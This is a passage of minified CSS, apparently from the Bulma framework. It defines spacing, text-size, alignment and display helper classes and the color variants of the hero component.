t-auto{margin-top:auto!important}.mr-auto{margin-right:auto!important}.mb-auto{margin-bottom:auto!important}.ml-auto{margin-left:auto!important}.mx-auto{margin-left:auto!important;margin-right:auto!important}.my-auto{margin-top:auto!important;margin-bottom:auto!important}.p-0{padding:0!important}.pt-0{padding-top:0!important}.pr-0{padding-right:0!important}.pb-0{padding-bottom:0!important}.pl-0{padding-left:0!important}.px-0{padding-left:0!important;padding-right:0!important}.py-0{padding-top:0!important;padding-bottom:0!important}.p-1{padding:.25rem!important}.pt-1{padding-top:.25rem!important}.pr-1{padding-right:.25rem!important}.pb-1{padding-bottom:.25rem!important}.pl-1{padding-left:.25rem!important}.px-1{padding-left:.25rem!important;padding-right:.25rem!important}.py-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.p-2{padding:.5rem!important}.pt-2{padding-top:.5rem!important}.pr-2{padding-right:.5rem!important}.pb-2{padding-bottom:.5rem!important}.pl-2{padding-left:.5rem!important}.px-2{padding-left:.5rem!important;padding-right:.5rem!important}.py-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.p-3{padding:.75rem!important}.pt-3{padding-top:.75rem!important}.pr-3{padding-right:.75rem!important}.pb-3{padding-bottom:.75rem!important}.pl-3{padding-left:.75rem!important}.px-3{padding-left:.75rem!important;padding-right:.75rem!important}.py-3{padding-top:.75rem!important;padding-bottom:.75rem!important}.p-4{padding:1rem!important}.pt-4{padding-top:1rem!important}.pr-4{padding-right:1rem!important}.pb-4{padding-bottom:1rem!important}.pl-4{padding-left:1rem!important}.px-4{padding-left:1rem!important;padding-right:1rem!important}.py-4{padding-top:1rem!important;padding-bottom:1rem!important}.p-5{padding:1.5rem!important}.pt-5{padding-top:1.5rem!important}.pr-5{padding-right:1.5rem!important}.pb-5{padding-bottom:1.5rem!important}.pl-5{padding-left:1.5rem!important}.px-5{padding-left:1.5rem!important;padding-right:1.5rem!important}.py-5{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.p-6{padding:3rem!important}.pt-6{padding-top:3rem!important}.pr-6{padding-right:3rem!important}.pb-6{padding-bottom:3rem!important}.pl-6{padding-left:3rem!important}.px-6{padding-left:3rem!important;padding-right:3rem!important}.py-6{padding-top:3rem!important;padding-bottom:3rem!important}.p-auto{padding:auto!important}.pt-auto{padding-top:auto!important}.pr-auto{padding-right:auto!important}.pb-auto{padding-bottom:auto!important}.pl-auto{padding-left:auto!important}.px-auto{padding-left:auto!important;padding-right:auto!important}.py-auto{padding-top:auto!important;padding-bottom:auto!important}.is-size-1{font-size:3rem!important}.is-size-2{font-size:2.5rem!important}.is-size-3{font-size:2rem!important}.is-size-4{font-size:1.5rem!important}.is-size-5{font-size:1.25rem!important}.is-size-6{font-size:1rem!important}.is-size-7{font-size:.75rem!important}@media screen and (max-width: 768px){.is-size-1-mobile{font-size:3rem!important}.is-size-2-mobile{font-size:2.5rem!important}.is-size-3-mobile{font-size:2rem!important}.is-size-4-mobile{font-size:1.5rem!important}.is-size-5-mobile{font-size:1.25rem!important}.is-size-6-mobile{font-size:1rem!important}.is-size-7-mobile{font-size:.75rem!important}}@media screen and (min-width: 769px),print{.is-size-1-tablet{font-size:3rem!important}.is-size-2-tablet{font-size:2.5rem!important}.is-size-3-tablet{font-size:2rem!important}.is-size-4-tablet{font-size:1.5rem!important}.is-size-5-tablet{font-size:1.25rem!important}.is-size-6-tablet{font-size:1rem!important}.is-size-7-tablet{font-size:.75rem!important}}@media screen and (max-width: 1023px){.is-size-1-touch{font-size:3rem!important}.is-size-2-touch{font-size:2.5rem!important}.is-size-3-touch{font-size:2rem!important}.is-size-4-touch{font-size:1.5rem!important}.is-size-5-touch{font-size:1.25rem!important}.is-size-6-touch{font-size:1rem!important}.is-size-7-touch{font-size:.75rem!important}}@media screen and (min-width: 1024px){.is-size-1-desktop{font-size:3rem!important}.is-size-2-desktop{font-size:2.5rem!important}.is-size-3-desktop{font-size:2rem!important}.is-size-4-desktop{font-size:1.5rem!important}.is-size-5-desktop{font-size:1.25rem!important}.is-size-6-desktop{font-size:1rem!important}.is-size-7-desktop{font-size:.75rem!important}}@media screen and (min-width: 1216px){.is-size-1-widescreen{font-size:3rem!important}.is-size-2-widescreen{font-size:2.5rem!important}.is-size-3-widescreen{font-size:2rem!important}.is-size-4-widescreen{font-size:1.5rem!important}.is-size-5-widescreen{font-size:1.25rem!important}.is-size-6-widescreen{font-size:1rem!important}.is-size-7-widescreen{font-size:.75rem!important}}@media screen and (min-width: 1408px){.is-size-1-fullhd{font-size:3rem!important}.is-size-2-fullhd{font-size:2.5rem!important}.is-size-3-fullhd{font-size:2rem!important}.is-size-4-fullhd{font-size:1.5rem!important}.is-size-5-fullhd{font-size:1.25rem!important}.is-size-6-fullhd{font-size:1rem!important}.is-size-7-fullhd{font-size:.75rem!important}}.has-text-centered{text-align:center!important}.has-text-justified{text-align:justify!important}.has-text-left{text-align:left!important}.has-text-right{text-align:right!important}@media screen and (max-width: 768px){.has-text-centered-mobile{text-align:center!important}}@media screen and (min-width: 769px),print{.has-text-centered-tablet{text-align:center!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-centered-tablet-only{text-align:center!important}}@media screen and (max-width: 1023px){.has-text-centered-touch{text-align:center!important}}@media screen and (min-width: 1024px){.has-text-centered-desktop{text-align:center!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-centered-desktop-only{text-align:center!important}}@media screen and (min-width: 1216px){.has-text-centered-widescreen{text-align:center!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-centered-widescreen-only{text-align:center!important}}@media screen and (min-width: 1408px){.has-text-centered-fullhd{text-align:center!important}}@media screen and (max-width: 768px){.has-text-justified-mobile{text-align:justify!important}}@media screen and (min-width: 769px),print{.has-text-justified-tablet{text-align:justify!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-justified-tablet-only{text-align:justify!important}}@media screen and (max-width: 1023px){.has-text-justified-touch{text-align:justify!important}}@media screen and (min-width: 1024px){.has-text-justified-desktop{text-align:justify!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-justified-desktop-only{text-align:justify!important}}@media screen and (min-width: 1216px){.has-text-justified-widescreen{text-align:justify!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-justified-widescreen-only{text-align:justify!important}}@media screen and (min-width: 1408px){.has-text-justified-fullhd{text-align:justify!important}}@media screen and (max-width: 768px){.has-text-left-mobile{text-align:left!important}}@media screen and (min-width: 769px),print{.has-text-left-tablet{text-align:left!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-left-tablet-only{text-align:left!important}}@media screen and (max-width: 1023px){.has-text-left-touch{text-align:left!important}}@media screen and (min-width: 1024px){.has-text-left-desktop{text-align:left!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-left-desktop-only{text-align:left!important}}@media screen and (min-width: 1216px){.has-text-left-widescreen{text-align:left!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-left-widescreen-only{text-align:left!important}}@media screen and (min-width: 1408px){.has-text-left-fullhd{text-align:left!important}}@media screen and (max-width: 768px){.has-text-right-mobile{text-align:right!important}}@media screen and (min-width: 769px),print{.has-text-right-tablet{text-align:right!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-right-tablet-only{text-align:right!important}}@media screen and (max-width: 1023px){.has-text-right-touch{text-align:right!important}}@media screen and (min-width: 1024px){.has-text-right-desktop{text-align:right!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-right-desktop-only{text-align:right!important}}@media screen and (min-width: 1216px){.has-text-right-widescreen{text-align:right!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-right-widescreen-only{text-align:right!important}}@media screen and (min-width: 1408px){.has-text-right-fullhd{text-align:right!important}}.is-capitalized{text-transform:capitalize!important}.is-lowercase{text-transform:lowercase!important}.is-uppercase{text-transform:uppercase!important}.is-italic{font-style:italic!important}.is-underlined{text-decoration:underline!important}.has-text-weight-light{font-weight:300!important}.has-text-weight-normal{font-weight:400!important}.has-text-weight-medium{font-weight:500!important}.has-text-weight-semibold{font-weight:600!important}.has-text-weight-bold{font-weight:700!important}.is-family-primary,.is-family-secondary,.is-family-sans-serif{font-family:BlinkMacSystemFont,-apple-system,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,Helvetica,Arial,sans-serif!important}.is-family-monospace,.is-family-code{font-family:monospace!important}.is-block{display:block!important}@media screen and (max-width: 768px){.is-block-mobile{display:block!important}}@media screen and (min-width: 769px),print{.is-block-tablet{display:block!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-block-tablet-only{display:block!important}}@media screen and (max-width: 1023px){.is-block-touch{display:block!important}}@media screen and (min-width: 1024px){.is-block-desktop{display:block!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-block-desktop-only{display:block!important}}@media screen and (min-width: 1216px){.is-block-widescreen{display:block!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-block-widescreen-only{display:block!important}}@media screen and (min-width: 1408px){.is-block-fullhd{display:block!important}}.is-flex{display:flex!important}@media screen and (max-width: 768px){.is-flex-mobile{display:flex!important}}@media screen and (min-width: 769px),print{.is-flex-tablet{display:flex!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-flex-tablet-only{display:flex!important}}@media screen and (max-width: 1023px){.is-flex-touch{display:flex!important}}@media screen and (min-width: 1024px){.is-flex-desktop{display:flex!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-flex-desktop-only{display:flex!important}}@media screen and (min-width: 1216px){.is-flex-widescreen{display:flex!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-flex-widescreen-only{display:flex!important}}@media screen and (min-width: 1408px){.is-flex-fullhd{display:flex!important}}.is-inline{display:inline!important}@media screen and (max-width: 768px){.is-inline-mobile{display:inline!important}}@media screen and (min-width: 769px),print{.is-inline-tablet{display:inline!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-inline-tablet-only{display:inline!important}}@media screen and (max-width: 1023px){.is-inline-touch{display:inline!important}}@media screen and (min-width: 1024px){.is-inline-desktop{display:inline!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-inline-desktop-only{display:inline!important}}@media screen and (min-width: 1216px){.is-inline-widescreen{display:inline!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-inline-widescreen-only{display:inline!important}}@media screen and (min-width: 1408px){.is-inline-fullhd{display:inline!important}}.is-inline-block{display:inline-block!important}@media screen and (max-width: 768px){.is-inline-block-mobile{display:inline-block!important}}@media screen and (min-width: 769px),print{.is-inline-block-tablet{display:inline-block!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-inline-block-tablet-only{display:inline-block!important}}@media screen and (max-width: 1023px){.is-inline-block-touch{display:inline-block!important}}@media screen and (min-width: 1024px){.is-inline-block-desktop{display:inline-block!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-inline-block-desktop-only{display:inline-block!important}}@media screen and (min-width: 1216px){.is-inline-block-widescreen{display:inline-block!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-inline-block-widescreen-only{display:inline-block!important}}@media screen and (min-width: 1408px){.is-inline-block-fullhd{display:inline-block!important}}.is-inline-flex{display:inline-flex!important}@media screen and (max-width: 768px){.is-inline-flex-mobile{display:inline-flex!important}}@media screen and (min-width: 769px),print{.is-inline-flex-tablet{display:inline-flex!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-inline-flex-tablet-only{display:inline-flex!important}}@media screen and (max-width: 1023px){.is-inline-flex-touch{display:inline-flex!important}}@media screen and (min-width: 1024px){.is-inline-flex-desktop{display:inline-flex!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-inline-flex-desktop-only{display:inline-flex!important}}@media screen and (min-width: 1216px){.is-inline-flex-widescreen{display:inline-flex!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-inline-flex-widescreen-only{display:inline-flex!important}}@media screen and (min-width: 1408px){.is-inline-flex-fullhd{display:inline-flex!important}}.is-hidden{display:none!important}.is-sr-only{border:none!important;clip:rect(0,0,0,0)!important;height:.01em!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:.01em!important}@media screen and (max-width: 768px){.is-hidden-mobile{display:none!important}}@media screen and (min-width: 769px),print{.is-hidden-tablet{display:none!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-hidden-tablet-only{display:none!important}}@media screen and (max-width: 1023px){.is-hidden-touch{display:none!important}}@media screen and (min-width: 1024px){.is-hidden-desktop{display:none!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-hidden-desktop-only{display:none!important}}@media screen and (min-width: 1216px){.is-hidden-widescreen{display:none!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-hidden-widescreen-only{display:none!important}}@media screen and (min-width: 1408px){.is-hidden-fullhd{display:none!important}}.is-invisible{visibility:hidden!important}@media screen and (max-width: 768px){.is-invisible-mobile{visibility:hidden!important}}@media screen and (min-width: 769px),print{.is-invisible-tablet{visibility:hidden!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-invisible-tablet-only{visibility:hidden!important}}@media screen and (max-width: 1023px){.is-invisible-touch{visibility:hidden!important}}@media screen and (min-width: 1024px){.is-invisible-desktop{visibility:hidden!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-invisible-desktop-only{visibility:hidden!important}}@media screen and (min-width: 1216px){.is-invisible-widescreen{visibility:hidden!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-invisible-widescreen-only{visibility:hidden!important}}@media screen and (min-width: 1408px){.is-invisible-fullhd{visibility:hidden!important}}.hero{align-items:stretch;display:flex;flex-direction:column;justify-content:space-between}.hero .navbar{background:none}.hero .tabs ul{border-bottom:none}.hero.is-white{background-color:#fff;color:#0a0a0a}.hero.is-white a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-white strong{color:inherit}.hero.is-white .title{color:#0a0a0a}.hero.is-white .subtitle{color:#0a0a0ae6}.hero.is-white .subtitle a:not(.button),.hero.is-white .subtitle strong{color:#0a0a0a}@media screen and (max-width: 1023px){.hero.is-white .navbar-menu{background-color:#fff}}.hero.is-white .navbar-item,.hero.is-white .navbar-link{color:#0a0a0ab3}.hero.is-white a.navbar-item:hover,.hero.is-white a.navbar-item.is-active,.hero.is-white .navbar-link:hover,.hero.is-white .navbar-link.is-active{background-color:#f2f2f2;color:#0a0a0a}.hero.is-white .tabs a{color:#0a0a0a;opacity:.9}.hero.is-white .tabs a:hover{opacity:1}.hero.is-white .tabs li.is-active a{color:#fff!important;opacity:1}.hero.is-white .tabs.is-boxed a,.hero.is-white .tabs.is-toggle a{color:#0a0a0a}.hero.is-white .tabs.is-boxed a:hover,.hero.is-white .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-white .tabs.is-boxed li.is-active a,.hero.is-white .tabs.is-boxed li.is-active a:hover,.hero.is-white .tabs.is-toggle li.is-active a,.hero.is-white .tabs.is-toggle li.is-active a:hover{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.hero.is-white.is-bold{background-image:linear-gradient(141deg,#e6e6e6 0%,white 71%,white 100%)}@media screen and (max-width: 768px){.hero.is-white.is-bold .navbar-menu{background-image:linear-gradient(141deg,#e6e6e6 0%,white 71%,white 100%)}}.hero.is-black{background-color:#0a0a0a;color:#fff}.hero.is-black a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-black strong{color:inherit}.hero.is-black .title{color:#fff}.hero.is-black .subtitle{color:#ffffffe6}.hero.is-black .subtitle a:not(.button),.hero.is-black .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-black .navbar-menu{background-color:#0a0a0a}}.hero.is-black .navbar-item,.hero.is-black .navbar-link{color:#ffffffb3}.hero.is-black a.navbar-item:hover,.hero.is-black a.navbar-item.is-active,.hero.is-black .navbar-link:hover,.hero.is-black .navbar-link.is-active{background-color:#000;color:#fff}.hero.is-black .tabs a{color:#fff;opacity:.9}.hero.is-black .tabs a:hover{opacity:1}.hero.is-black .tabs li.is-active a{color:#0a0a0a!important;opacity:1}.hero.is-black .tabs.is-boxed a,.hero.is-black .tabs.is-toggle a{color:#fff}.hero.is-black .tabs.is-boxed a:hover,.hero.is-black .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-black .tabs.is-boxed li.is-active a,.hero.is-black .tabs.is-boxed li.is-active a:hover,.hero.is-black .tabs.is-toggle li.is-active a,.hero.is-black .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#0a0a0a}.hero.is-black.is-bold{background-image:linear-gradient(141deg,black 0%,#0a0a0a 71%,#181616 100%)}@media screen and (max-width: 768px){.hero.is-black.is-bold .navbar-menu{background-image:linear-gradient(141deg,black 0%,#0a0a0a 71%,#181616 100%)}}.hero.is-light{background-color:#f5f5f5;color:#000000b3}.hero.is-light a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-light strong{color:inherit}.hero.is-light .title{color:#000000b3}.hero.is-light .subtitle{color:#000000e6}.hero.is-light .subtitle a:not(.button),.hero.is-light .subtitle strong{color:#000000b3}@media screen and (max-width: 1023px){.hero.is-light .navbar-menu{background-color:#f5f5f5}}.hero.is-light .navbar-item,.hero.is-light .navbar-link{color:#000000b3}.hero.is-light a.navbar-item:hover,.hero.is-light a.navbar-item.is-active,.hero.is-light .navbar-link:hover,.hero.is-light .navbar-link.is-active{background-color:#e8e8e8;color:#000000b3}.hero.is-light .tabs a{color:#000000b3;opacity:.9}.hero.is-light .tabs a:hover{opacity:1}.hero.is-light .tabs li.is-active a{color:#f5f5f5!important;opacity:1}.hero.is-light .tabs.is-boxed a,.hero.is-light .tabs.is-toggle a{color:#000000b3}.hero.is-light .tabs.is-boxed a:hover,.hero.is-light .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-light .tabs.is-boxed li.is-active a,.hero.is-light .tabs.is-boxed li.is-active a:hover,.hero.is-light .tabs.is-toggle li.is-active a,.hero.is-light .tabs.is-toggle li.is-active a:hover{background-color:#000000b3;border-color:#000000b3;color:#f5f5f5}.hero.is-light.is-bold{background-image:linear-gradient(141deg,#dfd8d9 0%,whitesmoke 71%,white 100%)}@media screen and (max-width: 768px){.hero.is-light.is-bold .navbar-menu{background-image:linear-gradient(141deg,#dfd8d9 0%,whitesmoke 71%,white 100%)}}.hero.is-dark{background-color:#363636;color:#fff}.hero.is-dark a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-dark strong{color:inherit}.hero.is-dark .title{color:#fff}.hero.is-dark .subtitle{color:#ffffffe6}.hero.is-dark .subtitle a:not(.button),.hero.is-dark .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-dark .navbar-menu{background-color:#363636}}.hero.is-dark .navbar-item,.hero.is-dark .navbar-link{color:#ffffffb3}.hero.is-dark a.navbar-item:hover,.hero.is-dark a.navbar-item.is-active,.hero.is-dark .navbar-link:hover,.hero.is-dark .navbar-link.is-active{background-color:#292929;color:#fff}.hero.is-dark .tabs a{color:#fff;opacity:.9}.hero.is-dark .tabs a:hover{opacity:1}.hero.is-dark .tabs li.is-active a{color:#363636!important;opacity:1}.hero.is-dark .tabs.is-boxed a,.hero.is-dark .tabs.is-toggle a{color:#fff}.hero.is-dark .tabs.is-boxed a:hover,.hero.is-dark .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-dark .tabs.is-boxed li.is-active a,.hero.is-dark .tabs.is-boxed li.is-active a:hover,.hero.is-dark .tabs.is-toggle li.is-active a,.hero.is-dark .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#363636}.hero.is-dark.is-bold{background-image:linear-gradient(141deg,#1f191a 0%,#363636 71%,#46403f 100%)}@media screen and (max-width: 768px){.hero.is-dark.is-bold .navbar-menu{background-image:linear-gradient(141deg,#1f191a 0%,#363636 71%,#46403f 100%)}}.hero.is-primary{background-color:#00d1b2;color:#fff}.hero.is-primary a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-primary strong{color:inherit}.hero.is-primary .title{color:#fff}.hero.is-primary .subtitle{color:#ffffffe6}.hero.is-primary .subtitle a:not(.button),.hero.is-primary .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-primary .navbar-menu{background-color:#00d1b2}}.hero.is-primary .navbar-item,.hero.is-primary .navbar-link{color:#ffffffb3}.hero.is-primary a.navbar-item:hover,.hero.is-primary a.navbar-item.is-active,.hero.is-primary .navbar-link:hover,.hero.is-primary .navbar-link.is-active{background-color:#00b89c;color:#fff}.hero.is-primary .tabs a{color:#fff;opacity:.9}.hero.is-primary .tabs a:hover{opacity:1}.hero.is-primary .tabs li.is-active a{color:#00d1b2!important;opacity:1}.hero.is-primary .tabs.is-boxed a,.hero.is-primary .tabs.is-toggle a{color:#fff}.hero.is-primary .tabs.is-boxed a:hover,.hero.is-primary .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-primary .tabs.is-boxed li.is-active a,.hero.is-primary .tabs.is-boxed li.is-active a:hover,.hero.is-primary .tabs.is-toggle li.is-active a,.hero.is-primary .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#00d1b2}.hero.is-primary.is-bold{background-image:linear-gradient(141deg,#009e6c 0%,#00d1b2 71%,#00e7eb 100%)}@media screen and (max-width: 768px){.hero.is-primary.is-bold .navbar-menu{background-image:linear-gradient(141deg,#009e6c 0%,#00d1b2 71%,#00e7eb 100%)}}.hero.is-link{background-color:#485fc7;color:#fff}.hero.is-link a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-link strong{color:inherit}.hero.is-link .title{color:#fff}.hero.is-link .subtitle{color:#ffffffe6}.hero.is-link .subtitle a:not(.button),.hero.is-link .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-link .navbar-menu{background-color:#485fc7}}.hero.is-link .navbar-item,.hero.is-link .navbar-link{color:#ffffffb3}.hero.is-link a.navbar-item:hover,.hero.is-link a.navbar-item.is-active,.hero.is-link .navbar-link:hover,.hero.is-link .navbar-link.is-active{background-color:#3a51bb;color:#fff}.hero.is-link .tabs a{color:#fff;opacity:.9}.hero.is-link .tabs a:hover{opacity:1}.hero.is-link .tabs li.is-active a{color:#485fc7!important;opacity:1}.hero.is-link .tabs.is-boxed a,.hero.is-link .tabs.is-toggle a{color:#fff}.hero.is-link .tabs.is-boxed a:hover,.hero.is-link .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-link .tabs.is-boxed li.is-active a,.hero.is-link .tabs.is-boxed li.is-active a:hover,.hero.is-link .tabs.is-toggle li.is-active a,.hero.is-link .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#485fc7}.hero.is-link.is-bold{background-image:linear-gradient(141deg,#2959b3 0%,#485fc7 71%,#5658d2 100%)}@media screen and (max-width: 768px){.hero.is-link.is-bold .navbar-menu{background-image:linear-gradient(141deg,#2959b3 0%,#485fc7 71%,#5658d2 100%)}}.hero.is-info{background-color:#3e8ed0;color:#fff}.hero.is-info a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-info strong{color:inherit}.hero.is-info .title{color:#fff}.hero.is-info .subtitle{color:#ffffffe6}.hero.is-info .subtitle a:not(.button),.hero.is-info .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-info .navbar-menu{background-color:#3e8ed0}}.hero.is-info .navbar-item,.hero.is-info .navbar-link{color:#ffffffb3}.hero.is-info a.navbar-item:hover,.hero.is-info a.navbar-item.is-active,.hero.is-info .navbar-link:hover,.hero.is-info .navbar-link.is-active{background-color:#3082c5;color:#fff}.hero.is-info .tabs a{color:#fff;opacity:.9}.hero.is-info .tabs a:hover{opacity:1}.hero.is-info .tabs li.is-active a{color:#3e8ed0!important;opacity:1}.hero.is-info .tabs.is-boxed a,.hero.is-info .tabs.is-toggle a{color:#fff}.hero.is-info .tabs.is-boxed a:hover,.hero.is-info .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-info .tabs.is-boxed li.is-active a,.hero.is-info .tabs.is-boxed li.is-active a:hover,.hero.is-info .tabs.is-toggle li.is-active a,.hero.is-info .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#3e8ed0}.hero.is-info.is-bold{background-image:linear-gradient(141deg,#208fbc 0%,#3e8ed0 71%,#4d83db 100%)}@media screen and (max-width: 768px){.hero.is-info.is-bold .navbar-menu{background-image:linear-gradient(141deg,#208fbc 0%,#3e8ed0 71%,#4d83db 100%)}}.hero.is-success{background-color:#48c78e;color:#fff}.hero.is-success a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-success strong{color:inherit}.hero.is-success .title{color:#fff}.hero.is-success .subtitle{color:#ffffffe6}.hero.is-success .subtitle a:not(.button),.hero.is-success .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-success .navbar-menu{background-color:#48c78e}}.hero.is-success .navbar-item,.hero.is-success .navbar-link{color:#ffffffb3}.hero.is-success a.navbar-item:hover,.hero.is-success a.navbar-item.is-active,.hero.is-success .navbar-link:hover,.hero.is-success .navbar-link.is-active{background-color:#3abb81;color:#fff}.hero.is-success .tabs a{color:#fff;opacity:.9}.hero.is-success .tabs a:hover{opacity:1}.hero.is-success .tabs li.is-active a{color:#48c78e!important;opacity:1}.hero.is-success .tabs.is-boxed a,.hero.is-success .tabs.is-toggle a{color:#fff}.hero.is-success .tabs.is-boxed a:hover,.hero.is-success .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-success .tabs.is-boxed li.is-active a,.hero.is-success .tabs.is-boxed li.is-active a:hover,.hero.is-success .tabs.is-toggle li.is-active a,.hero.is-success .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#48c78e}.hero.is-success.is-bold{background-image:linear-gradient(141deg,#29b35e 0%,#48c78e 71%,#56d2af 100%)}@media screen and (max-width: 768px){.hero.is-success.is-bold .navbar-menu{background-image:linear-gradient(141deg,#29b35e 0%,#48c78e 71%,#56d2af 100%)}}.hero.is-warning{background-color:#ffe08a;color:#000000b3}.hero.is-warning a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-warning strong{color:inherit}.hero.is-warning .title{color:#000000b3}.hero.is-warning .subtitle{color:#000000e6}.hero.is-warning .subtitle a:not(.button),.hero.is-warning .subtitle strong{color:#000000b3}@media screen and (max-width: 1023px){.hero.is-warning .navbar-menu{background-color:#ffe08a}}.hero.is-warning .navbar-item,.hero.is-warning .navbar-link{color:#000000b3}.hero.is-warning a.navbar-item:hover,.hero.is-warning a.navbar-item.is-active,.hero.is-warning .navbar-link:hover,.hero.is-warning .navbar-link.is-active{background-color:#ffd970;color:#000000b3}.hero.is-warning .tabs a{color:#000000b3;opacity:.9}.hero.is-warning .tabs a:hover{opacity:1}.hero.is-warning .tabs li.is-active a{color:#ffe08a!important;opacity:1}.hero.is-warning .tabs.is-boxed a,.hero.is-warning .tabs.is-toggle a{color:#000000b3}.hero.is-warning .tabs.is-boxed a:hover,.hero.is-warning .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-warning .tabs.is-boxed li.is-active a,.hero.is-warning .tabs.is-boxed li.is-active a:hover,.hero.is-warning .tabs.is-toggle li.is-active a,.hero.is-warning .tabs.is-toggle li.is-active a:hover{background-color:#000000b3;border-color:#000000b3;color:#ffe08a}.hero.is-warning.is-bold{background-image:linear-gradient(141deg,#ffb657 0%,#ffe08a 71%,#fff6a3 100%)}@media screen and (max-width: 768px){.hero.is-warning.is-bold .navbar-menu{background-image:linear-gradient(141deg,#ffb657 0%,#ffe08a 71%,#fff6a3 100%)}}.hero.is-danger{background-color:#f14668;color:#fff}.hero.is-danger a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-danger strong{color:inherit}.hero.is-danger .title{color:#fff}.hero.is-danger .subtitle{color:#ffffffe6}.hero.is-danger .subtitle a:not(.button),.hero.is-danger .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-danger .navbar-menu{background-color:#f14668}}.hero.is-danger .navbar-item,.hero.is-danger .navbar-link{color:#ffffffb3}.hero.is-danger a.navbar-item:hover,.hero.is-danger a.navbar-item.is-active,.hero.is-danger .navbar-link:hover,.hero.is-danger .navbar-link.is-active{background-color:#ef2e55;color:#fff}.hero.is-danger .tabs a{color:#fff;opacity:.9}.hero.is-danger .tabs a:hover{opacity:1}.hero.is-danger .tabs li.is-active a{color:#f14668!important;opacity:1}.hero.is-danger .tabs.is-boxed a,.hero.is-danger .tabs.is-toggle a{color:#fff}.hero.is-danger .tabs.is-boxed a:hover,.hero.is-danger .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-danger .tabs.is-boxed li.is-active a,.hero.is-danger .tabs.is-boxed li.is-active a:hover,.hero.is-danger .tabs.is-toggle li.is-active a,.hero.is-danger .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#f14668}.hero.is-danger.is-bold{background-image:linear-gradient(141deg,#fa0a62 0%,#f14668 71%,#f7595f 100%)}@media screen and (max-width: 768px){.hero.is-danger.is-bold .navbar-menu{background-image:linear-gradient(141deg,#fa0a62 0%,#f14668 71%,#f7595f 100%)}}.hero.is-small .hero-body{padding:1.5rem}@media screen and (min-width: 769px),print{.hero.is-medium .hero-body{padding:9rem 4.5rem}}@media screen and (min-width: 769px),print{.hero.is-large .hero-body{padding:18rem 